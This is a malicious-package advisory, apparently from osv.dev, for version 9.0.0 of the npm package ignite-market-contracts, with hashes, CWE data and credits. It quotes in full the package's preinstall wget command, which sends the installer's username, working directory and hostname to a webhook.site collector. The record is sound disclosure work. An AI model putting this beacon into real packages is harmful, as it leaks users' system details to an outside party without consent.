MAL-2026-4582

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contracts/MAL-2026-4582.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4582

Published

2026-05-22T00:15:50Z

Modified

2026-05-26T06:02:36.272873474Z

Summary

Malicious code in ignite-market-contracts (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc)

The package's preinstall lifecycle hook in package.json runs wget --quiet "https://webhook.site/64063d25-fcd3-44e5-a454-34845bc63250/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)", which fires automatically on npm install and transmits the installer's username, current working directory, and hostname to a third-party anonymous webhook collector. This is a recon beacon characteristic of dependency-confusion attacks: the installer-identifying data is sent to an attacker-controlled endpoint without consent. The package additionally has placeholder metadata (author 'me', empty description), a name that resembles legitimate marketplace/seaport contract packages, and declares a non-canonical dependency seaport-core-16 — all consistent with a dependency-confusion PoC or active recon stage targeting internal package namespaces.

Database specific

{
    "malicious-packages-origins": [
        {
            "import_time": "2026-05-26T05:51:56.295933915Z",
            "versions": [
                "9.0.0"
            ],
            "sha256": "3632f7802511e2852d33925ab4d8612fe588de1f8a1d832011cd3588d23f62bc",
            "id": "IN-MAL-2026-004100",
            "source": "amazon-inspector",
            "modified_time": "2026-05-22T00:15:50Z"
        }
    ]
}

References

https://www.npmjs.com/package/ignite-market-contracts/v/9.0.0

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / ignite-market-contracts

Package

Name: ignite-market-contracts; View open source insights on deps.dev
Purl: pkg:npm/ignite-market-contracts

Affected ranges

Affected versions

9.*

9.0.0

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "f8cb1efede8db0abca22b048e81c867ecb571053504c07ccb3c3f332aca048e8",
            "tlsh": "a4f07d799530eb571ac64f900820929ef271fa0b94412e0dde7323dd418e9db2479858",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-cEZOYHqu7Xw7V9SiaNM4aQ5ZE2keu4Zsdsa7z5HBCqZBDZRwgz/YlIcVxT8Q6rxWBwtMhq4FGhvos/+RqacBYQ==",
                "sha1": "3f80fd99f6bbee976c855b14f1e2e105605f7d4a"
            },
            "filename": "ignite-market-contracts-9.0.0.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contracts/MAL-2026-4582.json"